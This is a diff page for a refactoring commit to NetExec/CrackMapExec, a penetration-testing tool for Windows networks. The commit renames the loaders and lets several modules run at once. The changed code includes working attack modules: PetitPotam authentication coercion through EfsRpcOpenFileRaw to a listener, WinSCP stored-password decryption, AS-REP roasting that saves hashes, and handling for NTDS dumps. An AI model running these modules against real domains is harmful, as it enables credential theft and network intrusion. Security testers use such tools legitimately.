swisskyrepo
/
NetExec
mirror of https://github.com/swisskyrepo/NetExec.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #19 from mpgn/modules_marshall 

Modules Update
main
mpgn 2023-03-30 12:28:09 +02:00 committed by GitHub
parent 1b315e1c69 388f4798c2
commit 1af5780416
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
14 changed files with 691 additions and 485 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
cme/cli.py
View File

@ -4,16 +4,17 @@
import argparse
import sys
from argparse import RawTextHelpFormatter
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.helpers.logger import highlight
from termcolor import colored
def gen_cli_args():
VERSION = '5.4.6'
CODENAME = "Bruce Wayne"
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
parser = argparse.ArgumentParser(description=f"""
@ -64,7 +65,7 @@ def gen_cli_args():
module_parser = argparse.ArgumentParser(add_help=False)
mgroup = module_parser.add_mutually_exclusive_group()
mgroup.add_argument("-M", "--module", metavar='MODULE', help='module to use')
mgroup.add_argument("-M", "--module", action='append', metavar='MODULE', help='module to use')
#mgroup.add_argument('-MC','--module-chain', metavar='CHAIN_COMMAND', help='Payload module chain command string to run')
module_parser.add_argument('-o', metavar='MODULE_OPTION', nargs='+', default=[], dest='module_options', help='module options')
module_parser.add_argument('-L', '--list-modules', action='store_true', help='list available modules')
@ -84,7 +85,6 @@ def gen_cli_args():
args = parser.parse_args()
if args.version:
print(VERSION + " - " + CODENAME)
sys.exit(1)

6
cme/cmedb.py
View File

@ -11,7 +11,7 @@ import requests
from sqlalchemy import create_engine
from terminaltables import AsciiTable
import configparser
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.paths import CONFIG_PATH, WS_PATH, WORKSPACE_DIR
from requests import ConnectionError
from sqlalchemy.exc import SAWarning
@ -345,7 +345,7 @@ class CMEDBMenu(cmd.Cmd):
self.conn = None
self.p_loader = protocol_loader()
self.p_loader = ProtocolLoader()
self.protocols = self.p_loader.get_protocols()
self.workspace = self.config.get('CME', 'workspace')
@ -460,7 +460,7 @@ def initialize_db(logger):
logger.info('Creating default workspace')
os.mkdir(os.path.join(WS_PATH, 'default'))
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocols = p_loader.get_protocols()
for protocol in protocols.keys():
try:

23
cme/connection.py
View File

@ -127,8 +127,10 @@ class connection(object):
r = getattr(self, k)()
def call_modules(self):
for module in self.module:
logging.debug(f"Loading module {module}")
module_logger = CMEAdapter(extra={
'module': self.module.name.upper(),
'module': module.name.upper(),
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
@ -136,19 +138,22 @@ class connection(object):
context = Context(self.db, module_logger, self.args)
context.localip = self.local_ip
if hasattr(self.module, 'on_request') or hasattr(self.module, 'has_response'):
try:
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
self.server.connection = self
self.server.context.localip = self.local_ip
if hasattr(self.module, 'on_login'):
self.module.on_login(context, self)
if hasattr(module, 'on_login'):
module.on_login(context, self)
if self.admin_privs and hasattr(self.module, 'on_admin_login'):
self.module.on_admin_login(context, self)
if self.admin_privs and hasattr(module, 'on_admin_login'):
module.on_admin_login(context, self)
if (not hasattr(self.module, 'on_request') and not hasattr(self.module, 'has_response')) and hasattr(self.module, 'on_shutdown'):
self.module.on_shutdown(context, self)
if (not hasattr(module, 'on_request') and not hasattr(module, 'has_response')) and hasattr(module,'on_shutdown'):
module.on_shutdown(context, self)
except Exception as e:
self.logger.error(f"Error while loading module {module}: {e}")
pass
def inc_failed_login(self, username):
global global_failed_logins

59
cme/crackmapexec.py
View File

@ -11,8 +11,8 @@ from cme.parsers.ip import parse_targets
from cme.parsers.nmap import parse_nmap_xml
from cme.parsers.nessus import parse_nessus_file
from cme.cli import gen_cli_args
from cme.loaders.protocol_loader import protocol_loader
from cme.loaders.module_loader import module_loader
from cme.loaders.protocolloader import ProtocolLoader
from cme.loaders.moduleloader import ModuleLoader
from cme.servers.http import CMEServer
from cme.first_run import first_run_setup
from cme.context import Context
@ -144,7 +144,7 @@ def main():
powershell.obfuscate_ps_scripts = True
logging.debug(f"Protocol: {args.protocol}")
p_loader = protocol_loader()
p_loader = ProtocolLoader()
protocol_path = p_loader.get_protocols()[args.protocol]['path']
logging.debug(f"Protocol Path: {protocol_path}")
protocol_db_path = p_loader.get_protocols()[args.protocol]['dbpath']
@ -165,56 +165,61 @@ def main():
setattr(protocol_object, 'config', config)
if hasattr(args, 'module'):
loader = module_loader(args, db, logger)
if args.list_modules:
loader = ModuleLoader(args, db, logger)
modules = loader.get_modules()
if args.list_modules:
for name, props in sorted(modules.items()):
logger.info('{:<25} {}'.format(name, props['description']))
sys.exit(0)
elif args.module and args.show_module_options:
modules = loader.get_modules()
for name, props in modules.items():
if args.module.lower() == name.lower():
logger.info('{} module options:\n{}'.format(name, props['options']))
for module in args.module:
logger.info(f"{module} module options:\n{modules[module]['options']}")
sys.exit(0)
elif args.module:
modules = loader.get_modules()
for name, props in modules.items():
if args.module.lower() == name.lower():
module = loader.init_module(props['path'])
setattr(protocol_object, 'module', module)
break
if not module:
logger.error('Module not found')
logging.debug(f"Modules to be Loaded: {args.module}, {type(args.module)}")
for m in map(str.lower, args.module):
if m not in modules:
logger.error(f"Module not found: {m}")
exit(1)
if getattr(module, 'opsec_safe') is False:
ans = input(highlight('[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ', 'red'))
logging.debug(f"Loading module {m} at path {modules[m]['path']}")
module = loader.init_module(modules[m]['path'])
if not module.opsec_safe:
ans = input(
highlight('[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ', 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if getattr(module, 'multiple_hosts') is False and len(targets) > 1:
if not module.multiple_hosts and len(targets) > 1:
ans = input(highlight("[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ", 'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if hasattr(module, 'on_request') or hasattr(module, 'has_response'):
if hasattr(module, 'required_server'):
args.server = getattr(module, 'required_server')
args.server = module.required_server
if not args.server_port:
args.server_port = server_port_dict[args.server]
# loading a module server multiple times will obviously fail
try:
context = Context(db, logger, args)
module_server = CMEServer(module, context, logger, args.server_host, args.server_port, args.server)
module_server.start()
setattr(protocol_object, 'server', module_server.server)
protocol_object.server = module_server.server
except Exception as e:
logging.debug(f"Error loading module server for {module}: {e}")
logging.debug(f"proto_object: {protocol_object}, type: {type(protocol_object)}")
logging.debug(f"proto object dir: {dir(protocol_object)}")
# get currently set modules, otherwise default to empty list
current_modules = getattr(protocol_object, 'module', [])
current_modules.append(module)
setattr(protocol_object, 'module', current_modules)
logging.debug(f"proto object module after adding: {protocol_object.module}")
if hasattr(args, 'ntds') and args.ntds and not args.userntds:
ans = input(highlight('[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] ', 'red'))

31
cme/loaders/module_loader.py → cme/loaders/moduleloader.py
View File

@ -1,16 +1,15 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import imp
import types
from importlib.machinery import SourceFileLoader
import importlib
import logging
import os
import sys
import cme
from cme.context import Context
from cme.logger import CMEAdapter
class module_loader:
class ModuleLoader:
def __init__(self, args, db, logger):
self.args = args
self.db = db
@ -19,7 +18,6 @@ class module_loader:
def module_is_sane(self, module, module_path):
module_error = False
if not hasattr(module, 'name'):
self.logger.error('{} missing the name variable'.format(module_path))
module_error = True
@ -47,44 +45,44 @@ class module_loader:
if module_error:
return False
return True
def load_module(self, module_path):
try:
module = imp.load_source('payload_module', module_path).CMEModule()
spec = importlib.util.spec_from_file_location("CMEModule", module_path)
module = spec.loader.load_module().CMEModule()
if self.module_is_sane(module, module_path):
return module
except Exception as e:
self.logger.error('Failed loading module at {}: {}'.format(module_path, e))
return None
def get_modules(self):
modules = {}
modules_paths = [os.path.join(os.path.dirname(cme.__file__), 'modules'), os.path.join(self.cme_path, 'modules')]
for path in modules_paths:
for module in os.listdir(path):
if module[-3:] == '.py' and module != 'example_module.py':
module_path = os.path.join(path, module)
m = self.load_module(os.path.join(path, module))
if m and (self.args.protocol in m.supported_protocols):
modules[m.name] = {'path': os.path.join(path, module), 'description': m.description, 'options': m.options.__doc__}#'chain_support': m.chain_support}
m = self.load_module(module_path)
if m and (self.args.protocol in m.supported_protocols):
modules[m.name.lower()] = {
'path': module_path,
'description': m.description,
'options': m.options.__doc__
} # 'chain_support': m.chain_support}
return modules
def init_module(self, module_path):
module = None
module = self.load_module(module_path)
if module:
module_logger = CMEAdapter(extra={'module': module.name.upper()})
context = Context(self.db, module_logger, self.args)
module_options = {}
for option in self.args.module_options:
@ -92,5 +90,4 @@ class module_loader:
module_options[str(key).upper()] = value
module.options(context, module_options)
return module

3
cme/loaders/protocol_loader.py → cme/loaders/protocolloader.py
View File

@ -6,7 +6,7 @@ import os
import cme
class protocol_loader:
class ProtocolLoader:
def __init__(self):
self.cme_path = os.path.expanduser('~/.cme')
@ -14,7 +14,6 @@ class protocol_loader:
loader = SourceFileLoader('protocol', protocol_path)
protocol = types.ModuleType(loader.name)
loader.exec_module(protocol)
#if self.module_is_sane(module, module_path):
return protocol
def get_protocols(self):

8
cme/modules/install_elevated.py
View File

@ -2,7 +2,7 @@
# -*- coding: utf-8 -*-
import logging
from impacket.dcerpc.v5.scmr import DCERPCSessionError
from impacket.dcerpc.v5 import scmr
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
@ -55,5 +55,7 @@ class CMEModule:
finally:
try:
remote_ops.finish()
except DCERPCSessionError as e:
logging.debug(f"Received error while attempting to clean up logins: {e}")
except scmr.DCERPCSessionError as e:
logging.debug(f"Received SessionError while attempting to clean up logins: {e}")
except Exception as e:
logging.debug(f"Received general exception while attempting to clean up logins: {e}")

64
cme/modules/ntlmv1.py
View File

@ -1,48 +1,54 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5.rrp import DCERPCSessionError
class CMEModule:
'''
Detect if the targets's LmCompatibilityLevel will allow NTLMv1 authentication
"""
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
Module by @Tw1sm
'''
name = 'ntlmv1'
description = 'Detect if lmcompatibilitylevel on the target is set to 0 or 1'
supported_protocols = ['smb']
opsec_safe= True
"""
name = "ntlmv1"
description = "Detect if lmcompatibilitylevel on the target is set to 0 or 1"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
self.output = 'NTLMv1 allowed on: {} - LmCompatibilityLevel = {}'
self.output = "NTLMv1 allowed on: {} - LmCompatibilityLevel = {}"
def on_admin_login(self, context, connection):
try:
remoteOps = RemoteOperations(connection.conn, False)
remoteOps.enableRegistry()
remote_ops = RemoteOperations(connection.conn, False)
remote_ops.enableRegistry()
if remoteOps._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
regHandle = ans['phKey']
if remote_ops._RemoteOperations__rrp:
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
reg_handle = ans["phKey"]
ans = rrp.hBaseRegOpenKey(
remote_ops._RemoteOperations__rrp,
reg_handle,
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
)
key_handle = ans['phkResult']
rtype = None
data = None
try:
rtype, data = rrp.hBaseRegQueryValue(
remote_ops._RemoteOperations__rrp,
key_handle,
"lmcompatibilitylevel\x00"
)
except rrp.DCERPCSessionError as e:
logging.debug(f"Unable to reference lmcompatabilitylevel, which probably means ntlmv1 is not set")
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\Lsa')
keyHandle = ans['phkResult']
rtype, data = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, 'lmcompatibilitylevel\x00')
if int(data) in [0, 1, 2]:
if rtype and data and int(data) in [0, 1, 2]:
context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
try:
remoteOps.finish()
except:
pass
except DCERPCSessionError as e:
try:
remoteOps.finish()
except:
pass
logging.debug(f"Error connecting to RemoteRegistry: {e}")
finally:
remote_ops.finish()

52
cme/modules/petitpotam.py
View File

@ -5,6 +5,8 @@
# Module by @mpgn_x64
import logging
import sys
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
@ -19,7 +21,7 @@ class CMEModule:
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
supported_protocols = ['smb']
opsec_safe = True
multiple_hosts = False
multiple_hosts = True
def options(self, context, module_options):
'''
@ -34,9 +36,19 @@ class CMEModule:
self.pipe = module_options['PIPE']
def on_login(self, context, connection):
plop = CoerceAuth()
dce = plop.connect(connection.username, password=connection.password, domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, target=connection.host, pipe=self.pipe, targetIp=connection.host, doKerberos=connection.kerberos, dcHost=connection.kdcHost)
if plop.EfsRpcOpenFileRaw(dce, self.listener):
dce = coerce(
connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
target=connection.host,
pipe=self.pipe,
do_kerberos=connection.kerberos,
dc_host=connection.kdcHost,
target_ip=connection.host
)
if efs_rpc_open_file_raw(dce, self.listener):
context.log.highlight("VULNERABLE")
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
try:
@ -109,6 +121,7 @@ class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
@ -135,13 +148,6 @@ class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
@ -179,8 +185,8 @@ class EfsRpcEncryptFileSrvResponse(NDRCALL):
('ErrorCode', ULONG),
)
class CoerceAuth:
def connect(self, username, password, domain, lmhash, nthash, target, pipe, targetIp, doKerberos, dcHost):
def coerce(username, password, domain, lmhash, nthash, target, pipe, do_kerberos, dc_host, target_ip=None):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
@ -203,19 +209,19 @@ class CoerceAuth:
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpc_transport, 'set_credentials'):
rpc_transport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if targetIp:
rpctransport.setRemoteHost(targetIp)
if target_ip:
rpc_transport.setRemoteHost(target_ip)
dce = rpctransport.get_dce_rpc()
dce = rpc_transport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
if do_kerberos:
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
logging.debug("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
@ -234,13 +240,13 @@ class CoerceAuth:
logging.debug("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
def efs_rpc_open_file_raw(dce, listener):
logging.debug("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:

3
cme/modules/winscp_dump.py
View File

@ -7,6 +7,7 @@
# - https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/parser/winscp.rb
import traceback
from typing import Tuple
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations
@ -105,7 +106,7 @@ class CMEModule:
clearpass = clearpass[len(key):]
return clearpass
def dec_next_char(self, passBytes) -> tuple[int, bytes]:
def dec_next_char(self, passBytes) -> "Tuple[int, bytes]":
"""
Decrypts the first byte of the password and returns the decrypted byte and the remaining bytes.
Parameters

388
cme/protocols/ldap.py
View File

@ -35,20 +35,23 @@ from pywerview.cli.helpers import *
from re import sub, I
from zipfile import ZipFile
from OpenSSL.SSL import SysCallError
ldap_error_status = {
"1":"STATUS_NOT_SUPPORTED",
"533":"STATUS_ACCOUNT_DISABLED",
"701":"STATUS_ACCOUNT_EXPIRED",
"531":"STATUS_ACCOUNT_RESTRICTION",
"530":"STATUS_INVALID_LOGON_HOURS",
"532":"STATUS_PASSWORD_EXPIRED",
"773":"STATUS_PASSWORD_MUST_CHANGE",
"775":"USER_ACCOUNT_LOCKED",
"50":"LDAP_INSUFFICIENT_ACCESS",
"KDC_ERR_CLIENT_REVOKED":"KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED":"KDC_ERR_PREAUTH_FAILED"
"1": "STATUS_NOT_SUPPORTED",
"533": "STATUS_ACCOUNT_DISABLED",
"701": "STATUS_ACCOUNT_EXPIRED",
"531": "STATUS_ACCOUNT_RESTRICTION",
"530": "STATUS_INVALID_LOGON_HOURS",
"532": "STATUS_PASSWORD_EXPIRED",
"773": "STATUS_PASSWORD_MUST_CHANGE",
"775": "USER_ACCOUNT_LOCKED",
"50": "LDAP_INSUFFICIENT_ACCESS",
"KDC_ERR_CLIENT_REVOKED": "KDC_ERR_CLIENT_REVOKED",
"KDC_ERR_PREAUTH_FAILED": "KDC_ERR_PREAUTH_FAILED"
}
def resolve_collection_methods(methods):
"""
Convert methods (string) to list of validated methods to resolve
@ -186,20 +189,35 @@ class ldap(connection):
def get_ldap_info(self, host):
try:
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % host)
ldap_url = f"{proto}://{host}"
logging.debug(f"Connecting to {ldap_url} - {self.baseDN} [0]")
try:
ldap_connection = ldap_impacket.LDAPConnection(ldap_url)
except SysCallError as e:
if proto == "ldaps":
logging.debug(f"LDAPs connection to {ldap_url} failed - {e}")
# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority
logging.debug(f"Even if the port is open, LDAPS may not be configured")
else:
logging.debug(f"LDAP connection to {ldap_url} failed: {e}")
return [None, None, None]
resp = ldapConnection.search(scope=ldapasn1_impacket.Scope('baseObject'), attributes=['defaultNamingContext', 'dnsHostName'], sizeLimit=0)
resp = ldap_connection.search(
scope=ldapasn1_impacket.Scope('baseObject'),
attributes=['defaultNamingContext', 'dnsHostName'],
sizeLimit=0
)
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
target = None
targetDomain = None
baseDN = None
target_domain = None
base_dn = None
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'defaultNamingContext':
baseDN = str(attribute['vals'][0])
targetDomain = sub(',DC=', '.', baseDN[baseDN.lower().find('dc='):], flags=I)[3:]
base_dn = str(attribute['vals'][0])
target_domain = sub(',DC=', '.', base_dn[base_dn.lower().find('dc='):], flags=I)[3:]
if str(attribute['type']) == 'dnsHostName':
target = str(attribute['vals'][0])
except Exception as e:
@ -208,12 +226,12 @@ class ldap(connection):
except OSError as e:
return [None, None, None]
return [target, targetDomain, baseDN]
return [target, target_domain, base_dn]
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
string_binding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(string_binding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
@ -221,30 +239,29 @@ class ldap(connection):
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
except DCERPCException as e:
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def get_ldap_username(self):
extendedRequest = ldapasn1_impacket.ExtendedRequest()
extendedRequest['requestName'] = '1.3.6.1.4.1.4203.1.11.3' # whoami
extended_request = ldapasn1_impacket.ExtendedRequest()
extended_request['requestName'] = '1.3.6.1.4.1.4203.1.11.3' # whoami
response = self.ldapConnection.sendReceive(extendedRequest)
response = self.ldapConnection.sendReceive(extended_request)
for message in response:
searchResult = message['protocolOp'].getComponent()
if searchResult['resultCode'] == ldapasn1_impacket.ResultCode('success'):
responseValue = searchResult['responseValue']
if responseValue.hasValue():
value = responseValue.asOctets().decode(responseValue.encoding)[2:]
search_result = message['protocolOp'].getComponent()
if search_result['resultCode'] == ldapasn1_impacket.ResultCode('success'):
response_value = search_result['responseValue']
if response_value.hasValue():
value = response_value.asOctets().decode(response_value.encoding)[2:]
return value.split('\\')[1]
return ''
@ -261,7 +278,7 @@ class ldap(connection):
try:
self.conn.login('', '')
except BrokenPipeError as e:
self.logger.error(f"Broken Pipe Error while attempting to login")
self.logger.error(f"Broken Pipe Error while attempting to login: {e}")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
self.no_ntlm = True
@ -277,21 +294,17 @@ class ldap(connection):
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
# DC's seem to want us to logoff first, windows workstations sometimes reset the connection
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
# Re-connect since we logged off
self.create_conn_obj()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
self.output_filename = self.output_filename.replace(":", "-")
@ -301,21 +314,23 @@ class ldap(connection):
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "389"
self.logger.info(u"Connecting to LDAP {}".format(self.hostname))
#self.logger.info(self.endpoint)
# self.logger.info(self.endpoint)
else:
self.logger.extra['protocol'] = "SMB" if not self.no_ntlm else "LDAP"
self.logger.extra['port'] = "445" if not self.no_ntlm else "389"
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(
self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
self.smbv1)
)
self.logger.extra['protocol'] = "LDAP"
#self.logger.info(self.endpoint)
# self.logger.info(self.endpoint)
return True
def kerberos_login(self, domain, username, password = '', ntlm_hash = '', aesKey = '', kdcHost = '', useCache = False):
def kerberos_login(self, domain, username, password='', ntlm_hash='', aesKey='', kdcHost='', useCache=False):
logging.getLogger("impacket").disabled = True
self.username = username
self.password = password
@ -326,22 +341,24 @@ class ldap(connection):
lmhash = ''
nthash = ''
self.username = username
#This checks to see if we didn't provide the LM Hash
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
self.hash = nthash
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
hash_tgt = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_tgt:
self.logger.highlight(u'{}'.format(hash_tgt))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
hash_asreproast.write(hash_tgt + '\n')
return False
if not all('' == s for s in [self.nthash, password, aesKey]):
@ -352,21 +369,32 @@ class ldap(connection):
try:
# Connect to LDAP
proto = "ldaps" if (self.args.gmsa or self.args.port == 636) else "ldap"
self.ldapConnection = ldap_impacket.LDAPConnection(proto + '://%s' % self.target, self.baseDN)
self.ldapConnection.kerberosLogin(username, password, domain, self.lmhash, self.nthash,
aesKey, kdcHost=kdcHost, useCache=useCache)
ldap_url = f"{proto}://{self.target}"
logging.debug(f"Connecting to {ldap_url} - {self.baseDN} [1]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldap_url, self.baseDN)
self.ldapConnection.kerberosLogin(
username,
password,
domain,
self.lmhash,
self.nthash,
aesKey,
kdcHost=kdcHost,
useCache=useCache
)
if self.username == '':
self.username = self.get_ldap_username()
self.check_if_admin()
out = u'{}\\{}{} {}'.format(domain,
out = u'{}\\{}{} {}'.format(
domain,
self.username,
# Show what was used between cleartext, nthash, aesKey and ccache
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAP"
self.logger.extra['port'] = "636" if (self.args.gmsa or self.args.port == 636) else "389"
@ -378,37 +406,51 @@ class ldap(connection):
return True
except SessionKeyDecryptionError:
# for PRE-AUTH account
self.logger.error(u'{}\\{}{} {}'.format(domain,
self.logger.error(u'{}\\{}{} {}'.format(
domain,
self.username,
" account vulnerable to asreproast attack",
""),
color='yellow')
color='yellow'
)
return False
except SessionError as e:
error, desc = e.getErrorString()
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(error)),
color='magenta' if error in ldap_error_status else 'red')
color='magenta' if error in ldap_error_status else 'red'
)
return False
except (KeyError, KerberosException, OSError) as e:
self.logger.error(u'{}\\{}{} {}'.format(self.domain,
self.logger.error(u'{}\\{}{} {}'.format(
self.domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
str(e)),
color='red')
color='red'
)
return False
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
# Connect to LDAPS
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % self.target, self.baseDN)
self.ldapConnection.kerberosLogin(username, password, domain, self.lmhash, self.nthash,
aesKey, kdcHost=kdcHost, useCache=useCache)
ldaps_url = f"ldaps://{self.target}"
logging.debug(f"Connecting to {ldaps_url} - {self.baseDN} [2]")
self.ldapConnection = ldap_impacket.LDAPConnection(ldaps_url, self.baseDN)
self.ldapConnection.kerberosLogin(
username,
password,
domain,
self.lmhash,
self.nthash,
aesKey,
kdcHost=kdcHost,
useCache=useCache
)
if self.username == '':
self.username = self.get_ldap_username()
@ -416,11 +458,12 @@ class ldap(connection):
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{}{} {}'.format(domain,
out = u'{}\\{}{} {}'.format(
domain,
self.username,
" from ccache" if useCache
else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
" from ccache" if useCache else ":%s" % (kerb_pass if not self.config.get('CME', 'audit_mode') else self.config.get('CME', 'audit_mode')*8),
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
if self.username == '':
self.username = self.get_ldap_username()
@ -428,9 +471,11 @@ class ldap(connection):
self.check_if_admin()
# Prepare success credential text
out = u'{}\\{} {}'.format(domain,
out = u'{}\\{} {}'.format(
domain,
self.username,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')
)
self.logger.extra['protocol'] = "LDAPS"
self.logger.extra['port'] = "636"
@ -441,30 +486,34 @@ class ldap(connection):
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
errorCode = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(self.domain,
error_code = str(e).split()[-2][:-1]
self.logger.error(u'{}\\{}:{} {}'.format(
self.domain,
self.username,
